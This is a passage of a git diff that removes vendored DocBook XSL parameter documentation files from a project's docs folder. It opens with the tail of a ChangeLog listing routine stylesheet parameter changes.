formal.object.properties.xml: Whitespace and documentation changes - - * ignore.image.scaling.xml: New file. - -2002-12-29 Norman Walsh - - * use.role.as.xrefstyle.xml: Updated documentation; added an example showing how to use xrefstyle in the stylesheets - -2002-12-28 Norman Walsh - - * admonition.properties.xml, admonition.title.properties.xml: - Whitespace and documentation tweaks - -2002-12-17 Jirka Kosek - - * preferred.mediaobject.role.xml: Fixed build problems with new parameters. - - * profile.role.xml: Ooops. No DTD, no entites :-( - - * profile.role.xml: Added warning against usage of role attribute for profiling. - -2002-12-06 Robert Stayton - - * preferred.mediaobject.role.xml, use.role.for.mediaobject.xml: - New file. - -2002-10-31 Norman Walsh - - * table.frame.border.thickness.xml, toc.margin.properties.xml, verbatim.properties.xml, xref.properties.xml: - Documentation updates - -2002-10-21 Norman Walsh - - * footer.content.properties.xml, header.content.properties.xml: - Updated header/footer properties to avoid missmatched margins caused by title.margin.left - -2002-10-20 Norman Walsh - - * monospace.properties.xml: Bug #589631: Make monospace font size 0.9em rather than 0.9*body.font.size so that it works in different contexts (like chapter titles - -2002-10-19 Norman Walsh - - * footer.content.properties.xml, header.content.properties.xml: - New file. - -2002-10-04 Norman Walsh - - * generate.toc.xml: Specify titles for ToCs - - * table.border.color.xml, table.border.padding.xml, table.border.style.xml, table.border.thickness.xml, table.cell.border.color.xml, table.cell.border.style.xml, table.cell.border.thickness.xml, table.frame.border.color.xml, table.frame.border.style.xml, table.frame.border.thickness.xml: - Made separate parameters for table frame and table cell border properties - -2002-10-01 Robert Stayton - - * section.title.level1.properties.xml, section.title.level2.properties.xml, section.title.level3.properties.xml, section.title.level4.properties.xml, section.title.level5.properties.xml: - Moved font sizes one level to compensate for change of - the section.level template returning a number that - matches the section level. The result should be no - change in output font sizes for section titles. - -2002-09-30 - - * list.block.spacing.xml: Adding space-after so there will be space after lists within paras (where there's text after the list. - -2002-09-27 Norman Walsh - - * default.float.class.xml: New file. - - * default.image.width.xml: New file. - - * funcsynopsis.tabular.threshold.xml: New file. - -2002-09-19 Robert Stayton - - * formal.title.properties.xml: Removed 'keep-with-next' from 'formal.title.properties' because - template now uses $placement value to determine if keep-with-next - or keep-with-previous should be used. - -2002-09-05 Norman Walsh - - * monospace.verbatim.properties.xml: Make monospaced verbatim environments text-aligned to the start. - -2002-09-04 Norman Walsh - - * generate.toc.xml: Suppress ToC in article/appendix by default - - * graphicsize.extension.xml, l10n.gentext.default.language.xml, l10n.gentext.language.xml, l10n.gentext.use.xref.language.xml: - New file. - -2002-09-01 Norman Walsh - - * body.font.family.xml, dingbat.font.family.xml, monospace.font.family.xml, sans.font.family.xml, title.font.family.xml: - Roll-back font families to single words - -2002-08-26 Norman Walsh - - * chunk.tocs.and.lots.xml: New file. - - * generate.toc.xml: Fixed typo in parameter reference - -2002-08-22 Jirka Kosek - - * htmlhelp.use.hhk.xml: New file. - -2002-08-21 Norman Walsh - - * make.index.markup.xml: Fixed typo - - * make.index.markup.xml: New file. - -2002-07-26 Norman Walsh - - * headers.on.blank.pages.xml: With the new scheme, this should be 1 - -2002-07-22 Robert Stayton - - * html.extra.head.links.xml: Changed the default from 1 to 0 because this feature - is not supported in all browsers, and because it - reduces processing performance by 20-30%. - -2002-07-19 Norman Walsh - - * bibliography.numbered.xml, menuchoice.menu.separator.xml, menuchoice.separator.xml, section.title.level1.properties.xml, section.title.level2.properties.xml, section.title.level3.properties.xml, section.title.level4.properties.xml, section.title.level5.properties.xml, section.title.level6.properties.xml: - New file. - - * monospace.properties.xml, monospace.verbatim.properties.xml: - Split monospaced properties from verbatim properties - - * section.title.properties.xml: Tweaked documentation - -2002-07-18 Norman Walsh - - * html.cellpadding.xml, html.cellspacing.xml: New file. - - * para.propagates.style.xml: New file. - -2002-07-17 Norman Walsh - - * body.margin.bottom.xml, body.margin.top.xml, page.margin.bottom.xml, page.margin.top.xml, region.after.extent.xml, region.before.extent.xml: - Tweak page head/foot margins - -2002-07-09 Norman Walsh - - * glossary.collection.xml: Bug #522017: describe how to make intra-glossary cross references - -2002-07-08 Norman Walsh - - * sidebar.properties.xml: New file. - -2002-07-06 Robert Stayton - - * target.database.document.xml: Changed the default value to empty string to remove - error message about trying to open a non-existent file. - - * target.database.document.xml: Changed name of default master data file to olinkdb.xml - because it was too similar to targets.db used for - the document data files. - -2002-07-05 Robert Stayton - - * collect.xref.targets.xml, current.docid.xml, olink.base.uri.xml, olink.doctitle.xml, target.database.document.xml, targets.filename.xml, use.local.olink.style.xml: - Removed the xml declaration at the top of the new param files - as it seems to trouble the parser. - - * collect.xref.targets.xml, current.docid.xml, olink.base.uri.xml, olink.doctitle.xml, target.database.document.xml, targets.filename.xml, use.local.olink.style.xml: - New file. - -2002-07-04 Norman Walsh - - * chunk.datafile.xml: Removed parameter: no longer (never?) used - -2002-07-03 Norman Walsh - - * footer.rule.xml, footers.on.blank.pages.xml, header.rule.xml, headers.on.blank.pages.xml: - New file. - - * insert.xref.page.number.xml: Improve description especially now that it works - -2002-07-02 Norman Walsh - - * column.count.back.xml, column.count.body.xml, column.count.front.xml, column.count.index.xml, column.count.lot.xml, column.count.of.index.xml, column.count.titlepage.xml, column.count.xml, draft.mode.xml: - Completely rewrote pagesetup.xsl: new/changed column count, draft mode, and margin parameters - -2002-07-02 Robert Stayton - - * generate.toc.xml: Added sect1 through sect5, which allows such section ToCs to be - controlled by just setting the generate.section.toc.level - parameter. - - * generate.toc.xml: Forgot to close my tag. - -2002-07-02 Norman Walsh - - * page.margin.top.xml, region.before.extent.xml: Completely rewrote pagesetup.xsl: new/changed column count, draft mode, and margin parameters - -2002-06-29 Norman Walsh - - * admon.graphics.xml, callout.graphics.path.xml, callout.graphics.xml: - Whitespace - -2002-06-27 Norman Walsh - - * glossary.as.blocks.xml, glosslist.as.blocks.xml, glossterm.separation.xml, glossterm.width.xml: - New file. - -2002-06-26 Norman Walsh - - * table.border.color.xml: Don't set table border color in HTML; allow a top-level CSS stylesheet to set it - -2002-06-13 Norman Walsh - - * chunker.output.cdata-section-elements.xml, chunker.output.doctype-public.xml, chunker.output.doctype-system.xml, chunker.output.encoding.xml, chunker.output.indent.xml, chunker.output.media-type.xml, chunker.output.method.xml, chunker.output.omit-xml-declaration.xml, chunker.output.standalone.xml, default.encoding.xml: - Created a complete and consistent set of chunking parameters - -2002-06-13 Jirka Kosek - - * htmlhelp.button.back.xml, htmlhelp.button.forward.xml, htmlhelp.button.hideshow.xml, htmlhelp.button.home.url.xml, htmlhelp.button.home.xml, htmlhelp.button.jump1.title.xml, htmlhelp.button.jump1.url.xml, htmlhelp.button.jump1.xml, htmlhelp.button.jump2.title.xml, htmlhelp.button.jump2.url.xml, htmlhelp.button.jump2.xml, htmlhelp.button.locate.xml, htmlhelp.button.next.xml, htmlhelp.button.options.xml, htmlhelp.button.prev.xml, htmlhelp.button.print.xml, htmlhelp.button.refresh.xml, htmlhelp.button.stop.xml, htmlhelp.button.zoom.xml, htmlhelp.hhc.binary.xml, htmlhelp.hhk.xml, htmlhelp.hhp.window.xml, htmlhelp.show.advanced.search.xml, htmlhelp.show.favorities.xml, htmlhelp.show.menu.xml: - New file. - - * htmlhelp.only.xml: New file. - -2002-06-13 Norman Walsh - - * output.method.xml, saxon.character.representation.xml: - Created a complete and consistent set of chunking parameters - -2002-06-12 Jirka Kosek - - * refentry.generate.name.xml, refentry.generate.title.xml: - Clarified explanation so no one else reports bugs like #563473. - - * suppress.footer.navigation.xml, suppress.header.navigation.xml: - New file. - -2002-06-11 Norman Walsh - - * body.font.family.xml, dingbat.font.family.xml, monospace.font.family.xml, sans.font.family.xml, title.font.family.xml: - Add generic fallbacks to font family specifications - - * make.graphic.viewport.xml, nominal.image.depth.xml, nominal.image.width.xml, use.embed.for.svg.xml: - New file. - - * refentry.title.properties.xml, section.title.properties.xml: - New file. - - * use.embed.for.svg.xml: Turn off use.embed.for.svg by default (it generates invalid html) - -2002-06-09 Norman Walsh - - * html.stylesheet.xml: Updated documentation to reflect that html.stylesheet can now take a list of URIs - -2002-06-07 - - * variablelist.as.blocks.xml: Fixing a couple of typos I made - -2002-06-06 Norman Walsh - - * generate.meta.abstract.xml, use.role.as.xrefstyle.xml: - New file. - - * variablelist.as.blocks.xml: Patch 521141: document variablelist pi - -2002-05-24 - - * callout.unicode.number.limit.xml, callout.unicode.start.character.xml: - Updating docs. - -2002-05-23 Norman Walsh - - * use.svg.xml: New file. - -2002-05-14 Michael Smith - - * generate.manifest.xml, manifest.xml: added descriptions - -2002-05-13 Norman Walsh - - * compact.list.item.spacing.xml: New file. - - * html.extra.head.links.xml: New file. - -2002-05-10 Jirka Kosek - - * generate.manifest.xml, manifest.xml: New file. - -2002-05-10 Norman Walsh - - * points.per.em.xml: New file. - - * using.chunker.xml: Obsolete parameter - -2002-04-20 Norman Walsh - - * generate.toc.xml: Improve documentation - - * shade.verbatim.style.xml: Support shade.verbatim in FO; stop using vendor test to decide what extension function to call for line numbering - - * verbatim.properties.xml: Whitespace - -2002-03-18 Norman Walsh - - * emphasis.propagates.style.xml: Whitespace - - * generate.appendix.toc.xml, generate.article.toc.xml, generate.book.equation.lot.xml, generate.book.example.lot.xml, generate.book.figure.lot.xml, generate.book.table.lot.xml, generate.book.toc.xml, generate.chapter.toc.xml, generate.component.toc.xml, generate.division.equation.lot.xml, generate.division.example.lot.xml, generate.division.figure.lot.xml, generate.division.table.lot.xml, generate.division.toc.xml, generate.part.toc.xml, generate.preface.toc.xml, generate.qandadiv.toc.xml, generate.qandaset.toc.xml, generate.reference.toc.xml, generate.section.toc.xml, generate.set.toc.xml, generate.toc.xml: - Replace generate.*.toc and generate.*.lot with single generate.toc parameter. - -2002-03-14 Norman Walsh - - * formal.procedures.xml: Fixed typos - - * formal.title.placement.xml: New file. - -2002-03-10 Norman Walsh - - * generate.id.attributes.xml: New file. - -2002-03-03 Jirka Kosek - - * profile.arch.xml, profile.attribute.xml, profile.condition.xml, profile.conformance.xml, profile.lang.xml, profile.os.xml, profile.revision.xml, profile.revisionflag.xml, profile.role.xml, profile.security.xml, profile.separator.xml, profile.userlevel.xml, profile.value.xml, profile.vendor.xml: - New file. - -2002-03-01 Norman Walsh - - * blockquote.properties.xml: Added space-after properties to blockquotes - - * formal.title.properties.xml: Added space-after properties - - * stylesheet.result.type.xml: Move stylesheet.result.type out of param and put it explicitly in each stylesheet because it has to be different - - * table.cell.padding.xml: New file. - - * ulink.hyphenate.xml: Make ulink hyphenation character the empty string by default - -2002-02-25 Robert Stayton - - * chunk.quietly.xml: New file. - -2002-02-21 Jirka Kosek - - * tex.math.delims.xml, tex.math.file.xml, tex.math.in.alt.xml: - Better control over delimiters for TeX equations. Added parameter tex.math.delims, when is set to 0, no delimiters (like $ and $$) are output. Same can be done for single equation by . - -2002-02-11 Norman Walsh - - * column.count.of.index.xml: New file. - -2002-02-10 Jirka Kosek - - * htmlhelp.default.topic.xml: New file. - -2002-02-09 Jirka Kosek - - * htmlhelp.hhc.show.root.xml: New file. - -2002-02-07 Norman Walsh - - * chunk.toc.xml, manual.toc.xml: New file. - - * informal.object.properties.xml: New file. - -2002-02-03 Jirka Kosek - - * htmlhelp.title.xml: New file. - -2002-01-29 Norman Walsh - - * draft.watermark.image.xml: New file. - -2002-01-28 Norman Walsh - - * html.cleanup.xml, make.valid.html.xml: Added html.cleanup parameter; if non-zero, do some post-processing of RTFs to improve formatting - - * ulink.hyphenate.xml: New file. - -2002-01-22 Jirka Kosek - - * htmlhelp.hhc.folders.instead.books.xml: New file. - -2002-01-10 Norman Walsh - - * body.margin.bottom.xml, body.margin.top.xml, page.margin.bottom.xml, page.margin.outer.xml, page.margin.top.xml, page.width.xml, region.after.extent.xml, region.before.extent.xml: - Rationalize margins; see new docs in the FO section - - * formal.object.properties.xml: Removed bogus keep - - * pixels.per.inch.xml: New file. - - * ulink.footnotes.xml, ulink.show.xml: New file. - -2002-01-06 Norman Walsh - - * bibliography.collection.xml, glossary.collection.xml: - Added documentation - -2002-01-04 Norman Walsh - - * firstterm.only.link.xml, glossary.collection.xml: New file. - -2002-01-03 Norman Walsh - - * format.variablelist.as.list.xml, variablelist.as.table.xml: - Renamed format.variablelist.as.table to variablelist.as.table - - * variablelist.as.blocks.xml: New file. - - * variablelist.as.table.xml: Fixed doc typos - -2002-01-01 Norman Walsh - - * blockquote.properties.xml, make.valid.html.xml, output.method.xml, refentry.generate.name.xml, refentry.generate.title.xml: - New and updated parameters - -2001-12-15 Jirka Kosek - - * tex.math.in.alt.xml: Improved support for TeX math inside equations. - -2001-12-06 Jirka Kosek - - * tex.math.file.xml, tex.math.in.alt.xml: New file. - -2001-12-04 Norman Walsh - - * admonition.properties.xml: New file. - - * admonition.title.properties.xml, chunk.first.sections.xml, chunk.section.depth.xml, line-height.xml: - New parameters - - * toc.indent.width.xml: New file. - -2001-11-28 Jirka Kosek - - * htmlhelp.alias.file.xml, htmlhelp.force.map.and.alias.xml, htmlhelp.map.file.xml: - New file. - - * htmlhelp.hhc.section.depth.xml: New file. - -2001-11-28 Norman Walsh - - * punct.honorific.xml: New file. - - * segmentedlist.as.table.xml: New file. - -2001-11-18 Jirka Kosek - - * glossterm.auto.link.xml: New file. - -2001-11-09 Norman Walsh - - * admon.graphics.extension.xml, admon.graphics.path.xml, admon.graphics.xml, admon.style.xml, admonition.title.properties.xml, alignment.xml, annotate.toc.xml, appendix.autolabel.xml, arbortext.extensions.xml, author.othername.in.middle.xml, autotoc.label.separator.xml, base.dir.xml, biblioentry.item.separator.xml, bibliography.collection.xml, body.font.family.xml, body.font.master.xml, body.font.size.xml, body.margin.bottom.xml, body.margin.top.xml, bridgehead.in.toc.xml, callout.defaultcolumn.xml, callout.graphics.extension.xml, callout.graphics.number.limit.xml, callout.graphics.path.xml, callout.graphics.xml, callout.list.table.xml, callout.unicode.font.xml, callout.unicode.number.limit.xml, callout.unicode.start.character.xml, callout.unicode.xml, callouts.extension.xml, chapter.autolabel.xml, chunk.datafile.xml, chunk.first.sections.xml, chunk.sections.xml, citerefentry.link.xml, column.count.xml, component.title.properties.xml, css.decoration.xml, default.encoding.xml, default.table.width.xml, default.units.xml, dingbat.font.family.xml, double.sided.xml, ebnf.table.bgcolor.xml, ebnf.table.border.xml, emphasis.propagates.style.xml, footnote.font.size.xml, fop.extensions.xml, formal.object.properties.xml, formal.procedures.xml, formal.title.properties.xml, format.variablelist.as.list.xml, funcsynopsis.decoration.xml, funcsynopsis.style.xml, function.parens.xml, generate.appendix.toc.xml, generate.article.toc.xml, generate.book.equation.lot.xml, generate.book.example.lot.xml, generate.book.figure.lot.xml, generate.book.table.lot.xml, generate.book.toc.xml, generate.chapter.toc.xml, generate.component.toc.xml, generate.division.equation.lot.xml, generate.division.example.lot.xml, generate.division.figure.lot.xml, generate.division.table.lot.xml, generate.division.toc.xml, generate.index.xml, generate.legalnotice.link.xml, generate.part.toc.xml, generate.preface.toc.xml, generate.qandadiv.toc.xml, generate.qandaset.toc.xml, generate.reference.toc.xml, generate.section.toc.level.xml, generate.section.toc.xml, generate.set.toc.xml, graphic.default.extension.xml, html.base.xml, html.ext.xml, html.longdesc.link.xml, html.longdesc.xml, html.stylesheet.type.xml, html.stylesheet.xml, htmlhelp.autolabel.xml, htmlhelp.chm.xml, htmlhelp.encoding.xml, htmlhelp.enumerate.images.xml, htmlhelp.hhc.xml, htmlhelp.hhp.tail.xml, htmlhelp.hhp.xml, hyphenate.xml, inherit.keywords.xml, insert.xref.page.number.xml, label.from.part.xml, linenumbering.everyNth.xml, linenumbering.extension.xml, linenumbering.separator.xml, linenumbering.width.xml, link.mailto.url.xml, list.block.spacing.xml, list.item.spacing.xml, make.single.year.ranges.xml, make.year.ranges.xml, monospace.font.family.xml, monospace.verbatim.properties.xml, navig.graphics.extension.xml, navig.graphics.path.xml, navig.graphics.xml, navig.showtitles.xml, nominal.table.width.xml, normal.para.spacing.xml, olink.fragid.xml, olink.outline.ext.xml, olink.pubid.xml, olink.resolver.xml, olink.sysid.xml, page.height.portrait.xml, page.height.xml, page.margin.bottom.xml, page.margin.inner.xml, page.margin.outer.xml, page.margin.top.xml, page.orientation.xml, page.width.portrait.xml, page.width.xml, paper.type.xml, part.autolabel.xml, passivetex.extensions.xml, phrase.propagates.style.xml, preface.autolabel.xml, process.empty.source.toc.xml, process.source.toc.xml, qanda.defaultlabel.xml, qanda.inherit.numeration.xml, qandadiv.autolabel.xml, refentry.generate.name.xml, refentry.separator.xml, refentry.xref.manvolnum.xml, region.after.extent.xml, region.before.extent.xml, root.filename.xml, rootid.xml, runinhead.default.title.end.punct.xml, runinhead.title.end.punct.xml, sans.font.family.xml, saxon.callouts.xml, saxon.character.representation.xml, saxon.linenumbering.xml, saxon.tablecolumns.xml, section.autolabel.xml, section.label.includes.component.label.xml, shade.verbatim.style.xml, shade.verbatim.xml, show.comments.xml, show.revisionflag.xml, spacing.paras.xml, stylesheet.result.type.xml, suppress.navigation.xml, table.border.color.xml, table.border.padding.xml, table.border.style.xml, table.border.thickness.xml, table.borders.with.css.xml, table.entry.padding.xml, tablecolumns.extension.xml, template.xml, textinsert.extension.xml, title.font.family.xml, title.margin.left.xml, toc.list.type.xml, toc.margin.properties.xml, toc.section.depth.xml, ulink.target.xml, use.extensions.xml, use.id.as.filename.xml, use.id.function.xml, using.chunker.xml, verbatim.properties.xml, xep.extensions.xml, xref.properties.xml: - Move the obvious ID value from the src:fragment to the refentry in parameter reference pages - -2001-11-06 Norman Walsh - - * admonition.title.properties.xml, autotoc.label.separator.xml, body.margin.top.xml, callout.unicode.xml, component.title.properties.xml, formal.object.properties.xml, formal.title.properties.xml, generate.appendix.toc.xml, generate.article.toc.xml, generate.book.equation.lot.xml, generate.book.example.lot.xml, generate.book.figure.lot.xml, generate.book.table.lot.xml, generate.book.toc.xml, generate.chapter.toc.xml, generate.index.xml, generate.part.toc.xml, generate.preface.toc.xml, generate.reference.toc.xml, generate.set.toc.xml, list.block.spacing.xml, list.item.spacing.xml, monospace.verbatim.properties.xml: - Documentation improvements from Dave Pawson - -2001-11-06 Robert Stayton - - * navig.graphics.extension.xml, navig.graphics.path.xml, navig.graphics.xml, navig.showtitles.xml: - New file. - -2001-11-06 Norman Walsh - - * normal.para.spacing.xml: Documentation improvements from Dave Pawson - -2001-11-05 Jirka Kosek - - * htmlhelp.autolabel.xml, htmlhelp.chm.xml, htmlhelp.encoding.xml, htmlhelp.enumerate.images.xml, htmlhelp.hhc.xml, htmlhelp.hhp.tail.xml, htmlhelp.hhp.xml: - New file. - -2001-10-16 Norman Walsh - - * html.longdesc.link.xml, html.longdesc.xml: New file. - -2001-10-15 Norman Walsh - - * table.borders.with.css.xml, table.entry.padding.xml: - New file. - -2001-10-08 Norman Walsh - - * table.border.color.xml, table.border.padding.xml, table.border.style.xml, table.border.thickness.xml, template.xml, title.margin.left.xml: - New params for FOs - -2001-10-07 Norman Walsh - - * admon.graphics.extension.xml, admon.graphics.path.xml, admon.graphics.xml, admon.style.xml, admonition.title.properties.xml, alignment.xml, annotate.toc.xml, appendix.autolabel.xml, arbortext.extensions.xml, author.othername.in.middle.xml, autotoc.label.separator.xml, base.dir.xml, biblioentry.item.separator.xml, bibliography.collection.xml, body.font.family.xml, body.font.master.xml, body.font.size.xml, body.margin.bottom.xml, body.margin.top.xml, bridgehead.in.toc.xml, callout.defaultcolumn.xml, callout.graphics.extension.xml, callout.graphics.number.limit.xml, callout.graphics.path.xml, callout.graphics.xml, callout.list.table.xml, callout.unicode.font.xml, callout.unicode.number.limit.xml, callout.unicode.start.character.xml, callout.unicode.xml, callouts.extension.xml, chapter.autolabel.xml, chunk.datafile.xml, chunk.first.sections.xml, chunk.sections.xml, citerefentry.link.xml, column.count.xml, component.title.properties.xml, css.decoration.xml, default.encoding.xml, default.table.width.xml, default.units.xml, dingbat.font.family.xml, double.sided.xml, ebnf.table.bgcolor.xml, ebnf.table.border.xml, emphasis.propagates.style.xml, footnote.font.size.xml, fop.extensions.xml, formal.object.properties.xml, formal.procedures.xml, formal.title.properties.xml, format.variablelist.as.list.xml, funcsynopsis.decoration.xml, funcsynopsis.style.xml, function.parens.xml, generate.appendix.toc.xml, generate.article.toc.xml, generate.book.equation.lot.xml, generate.book.example.lot.xml, generate.book.figure.lot.xml, generate.book.table.lot.xml, generate.book.toc.xml, generate.chapter.toc.xml, generate.component.toc.xml, generate.division.equation.lot.xml, generate.division.example.lot.xml, generate.division.figure.lot.xml, generate.division.table.lot.xml, generate.division.toc.xml, generate.index.xml, generate.legalnotice.link.xml, generate.part.toc.xml, generate.preface.toc.xml, generate.qandadiv.toc.xml, generate.qandaset.toc.xml, generate.reference.toc.xml, generate.section.toc.level.xml, generate.section.toc.xml, generate.set.toc.xml, graphic.default.extension.xml, html.base.xml, html.ext.xml, html.stylesheet.type.xml, html.stylesheet.xml, hyphenate.xml, inherit.keywords.xml, insert.xref.page.number.xml, label.from.part.xml, linenumbering.everyNth.xml, linenumbering.extension.xml, linenumbering.separator.xml, linenumbering.width.xml, link.mailto.url.xml, list.block.spacing.xml, list.item.spacing.xml, make.single.year.ranges.xml, make.year.ranges.xml, monospace.font.family.xml, monospace.verbatim.properties.xml, nominal.table.width.xml, normal.para.spacing.xml, olink.fragid.xml, olink.outline.ext.xml, olink.pubid.xml, olink.resolver.xml, olink.sysid.xml, page.height.portrait.xml, page.height.xml, page.margin.bottom.xml, page.margin.inner.xml, page.margin.outer.xml, page.margin.top.xml, page.orientation.xml, page.width.portrait.xml, page.width.xml, paper.type.xml, part.autolabel.xml, passivetex.extensions.xml, phrase.propagates.style.xml, preface.autolabel.xml, process.empty.source.toc.xml, process.source.toc.xml, qanda.defaultlabel.xml, qanda.inherit.numeration.xml, qandadiv.autolabel.xml, refentry.generate.name.xml, refentry.separator.xml, refentry.xref.manvolnum.xml, region.after.extent.xml, region.before.extent.xml, root.filename.xml, rootid.xml, runinhead.default.title.end.punct.xml, runinhead.title.end.punct.xml, sans.font.family.xml, saxon.callouts.xml, saxon.character.representation.xml, saxon.linenumbering.xml, saxon.tablecolumns.xml, section.autolabel.xml, section.label.includes.component.label.xml, shade.verbatim.style.xml, shade.verbatim.xml, show.comments.xml, show.revisionflag.xml, spacing.paras.xml, stylesheet.result.type.xml, suppress.navigation.xml, tablecolumns.extension.xml, template.xml, textinsert.extension.xml, title.font.family.xml, toc.list.type.xml, toc.margin.properties.xml, toc.section.depth.xml, ulink.target.xml, use.extensions.xml, use.id.as.filename.xml, use.id.function.xml, using.chunker.xml, verbatim.properties.xml, xep.extensions.xml, xref.properties.xml: - New file. - diff --git a/chardet/docs/docbook/xsl/params/admon.graphics.extension.xml b/chardet/docs/docbook/xsl/params/admon.graphics.extension.xml deleted file mode 100644 index 3eb973f..0000000 --- a/chardet/docs/docbook/xsl/params/admon.graphics.extension.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -admon.graphics.extension -string - - -admon.graphics.extension -Extension for admonition graphics - - - - - - -Description - -Sets the extension to use on admonition graphics. - - - diff --git a/chardet/docs/docbook/xsl/params/admon.graphics.path.xml b/chardet/docs/docbook/xsl/params/admon.graphics.path.xml deleted file mode 100644 index a0df85b..0000000 --- a/chardet/docs/docbook/xsl/params/admon.graphics.path.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -admon.graphics.path -string - - -admon.graphics.path -Path to admonition graphics - - - -images/ - - -Description - -Sets the path, probably relative to the directory where the HTML -files are created, to the admonition graphics. - - - - diff --git a/chardet/docs/docbook/xsl/params/admon.graphics.xml b/chardet/docs/docbook/xsl/params/admon.graphics.xml deleted file mode 100644 index eb2bc2b..0000000 --- a/chardet/docs/docbook/xsl/params/admon.graphics.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -admon.graphics -boolean - - -admon.graphics -Use graphics in admonitions? - - - - - - - - -Description - -If true (non-zero), admonitions are presented in an alternate style that uses -a graphic. Default graphics are provided in the distribution. - - - - diff --git a/chardet/docs/docbook/xsl/params/admon.style.xml b/chardet/docs/docbook/xsl/params/admon.style.xml deleted file mode 100644 index a49c7f3..0000000 --- a/chardet/docs/docbook/xsl/params/admon.style.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -admon.style -string - - -admon.style -CSS style attributes for admonitions - - - - - margin-left: 0.5in; margin-right: 0.5in; - - - -Description - -Specifies the value of the STYLE -attribute that should be added to admonitions. - - - - diff --git a/chardet/docs/docbook/xsl/params/admon.textlabel.xml b/chardet/docs/docbook/xsl/params/admon.textlabel.xml deleted file mode 100644 index 9588e8c..0000000 --- a/chardet/docs/docbook/xsl/params/admon.textlabel.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -admon.textlabel -boolean - - -admon.textlabel -Use text label in admonitions? - - - - - - - - -Description - -If true (non-zero), admonitions are presented with a generated -text label such as Note or Warning in the appropriate language. -If zero, such labels are turned off, but any title child -of the admonition element are still output. -The default value is 1. - - - - diff --git a/chardet/docs/docbook/xsl/params/admonition.properties.xml b/chardet/docs/docbook/xsl/params/admonition.properties.xml deleted file mode 100644 index e127e56..0000000 --- a/chardet/docs/docbook/xsl/params/admonition.properties.xml +++ /dev/null @@ -1,16 +0,0 @@ - - -admonition.properties -To set the style for admonitions. - - - - - - -Description -How do you want admonitions styled? -Set the font-size, weight, etc. to the style required - - - diff --git a/chardet/docs/docbook/xsl/params/admonition.title.properties.xml b/chardet/docs/docbook/xsl/params/admonition.title.properties.xml deleted file mode 100644 index 851391b..0000000 --- a/chardet/docs/docbook/xsl/params/admonition.title.properties.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -admonition.title.properties -To set the style for admonitions titles. - - - - - - 14pt - bold - false - always - - - -Description -How do you want admonitions titles styled? -Set the font-size, weight etc to the style required. - - - diff --git a/chardet/docs/docbook/xsl/params/alignment.xml b/chardet/docs/docbook/xsl/params/alignment.xml deleted file mode 100644 index ab304dc..0000000 --- a/chardet/docs/docbook/xsl/params/alignment.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -alignment - - - -alignment -Specify the default text alignment - - - -justify - - -Description - -The default text alignment is used for most body text. - - - - diff --git a/chardet/docs/docbook/xsl/params/annotate.toc.xml b/chardet/docs/docbook/xsl/params/annotate.toc.xml deleted file mode 100644 index a6dec4a..0000000 --- a/chardet/docs/docbook/xsl/params/annotate.toc.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -annotate.toc -boolean - - -annotate.toc -Annotate the Table of Contents? - - - - - - -Description - -If true, TOCs will be annotated. At present, this just means -that the RefPurpose of RefEntry -TOC entries will be displayed. - - - - diff --git a/chardet/docs/docbook/xsl/params/appendix.autolabel.xml b/chardet/docs/docbook/xsl/params/appendix.autolabel.xml deleted file mode 100644 index 08195a0..0000000 --- a/chardet/docs/docbook/xsl/params/appendix.autolabel.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -appendix.autolabel -boolean - - -appendix.autolabel -Are Appendixes automatically enumerated? - - - - - - -Description - -If true (non-zero), unlabeled appendixes will be -enumerated. - - - - diff --git a/chardet/docs/docbook/xsl/params/arbortext.extensions.xml b/chardet/docs/docbook/xsl/params/arbortext.extensions.xml deleted file mode 100644 index a956693..0000000 --- a/chardet/docs/docbook/xsl/params/arbortext.extensions.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -arbortext.extensions -boolean - - -arbortext.extensions -Enable Arbortext extensions? - - - - - - -Description - -If non-zero, -Arbortext -extensions will be used. - - - - diff --git a/chardet/docs/docbook/xsl/params/article.appendix.title.properties.xml b/chardet/docs/docbook/xsl/params/article.appendix.title.properties.xml deleted file mode 100644 index 455e1f7..0000000 --- a/chardet/docs/docbook/xsl/params/article.appendix.title.properties.xml +++ /dev/null @@ -1,30 +0,0 @@ - - -article.appendix.title.properties -attribute set - - -article.appendix.title.properties -Properties for appendix titles that appear in an article - - - - - - - - - - - - -Description - -The properties for the title of an appendix that -appears inside an article. The default is to use -the properties of sect1 titles. - - - diff --git a/chardet/docs/docbook/xsl/params/author.othername.in.middle.xml b/chardet/docs/docbook/xsl/params/author.othername.in.middle.xml deleted file mode 100644 index 6030022..0000000 --- a/chardet/docs/docbook/xsl/params/author.othername.in.middle.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -author.othername.in.middle -boolean - - -author.othername.in.middle -Is othername in author a -middle name? - - - - - - -Description - -If true (non-zero), the othername of an author -appears between the firstname and -surname. Otherwise, othername -is suppressed. - - - - diff --git a/chardet/docs/docbook/xsl/params/autotoc.label.separator.xml b/chardet/docs/docbook/xsl/params/autotoc.label.separator.xml deleted file mode 100644 index 20a8f00..0000000 --- a/chardet/docs/docbook/xsl/params/autotoc.label.separator.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -autotoc.label.separator -string - - -autotoc.label.separator -Separator between labels and titles in the ToC - - - - - - -Description - -String to use to seperate labels and title in a table of contents. - - - diff --git a/chardet/docs/docbook/xsl/params/axf.extensions.xml b/chardet/docs/docbook/xsl/params/axf.extensions.xml deleted file mode 100644 index 98278bd..0000000 --- a/chardet/docs/docbook/xsl/params/axf.extensions.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -axf.extensions -boolean - - -axf.extensions -Enable XSL Formatter extensions? - - - - - - - - -Description - -If non-zero, -XSL Formatter -extensions will be used. XSL Formatter extensions consists of PDF bookmarks, -document information and better index processing. - - - diff --git a/chardet/docs/docbook/xsl/params/base.dir.xml b/chardet/docs/docbook/xsl/params/base.dir.xml deleted file mode 100644 index 704e91c..0000000 --- a/chardet/docs/docbook/xsl/params/base.dir.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -base.dir - - - -base.dir -The base directory of chunks - - - - - - -Description - -If specified, the base.dir identifies -the output directory for chunks. (If not specified, the output directory -is system dependent.) - - - diff --git a/chardet/docs/docbook/xsl/params/biblioentry.item.separator.xml 